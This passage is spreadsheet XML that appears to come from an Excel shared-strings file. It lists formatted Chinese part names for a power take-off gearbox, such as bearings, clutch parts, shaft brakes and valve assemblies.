  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封架上部铸件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖铸件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块的支撑环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块的支撑板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承锁紧垫圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置传感器盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封底座盖</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带管侧盖</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装油泵外壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴毂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输入轴加工前毂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毂</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工前毂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油防护装置安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油防护总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油防护板</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端小齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心小齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏移小齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵小齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵驱动齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器毂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器锥套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器外壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器圆盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器圆盘加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器制动环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器制动板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器定位销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内齿</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外齿</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴密封法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装好的轴刹车系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴刹车系统总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴刹车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴制动器总成支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴刹车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴刹车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架定距块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀组件总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀组件油堵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀组件加工前</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油压滑动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器油压滑动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器油压衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧帽法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀组件总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀油堵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀预加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比例阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先导阀</t>
    </r>
    <r>
      <rPr>
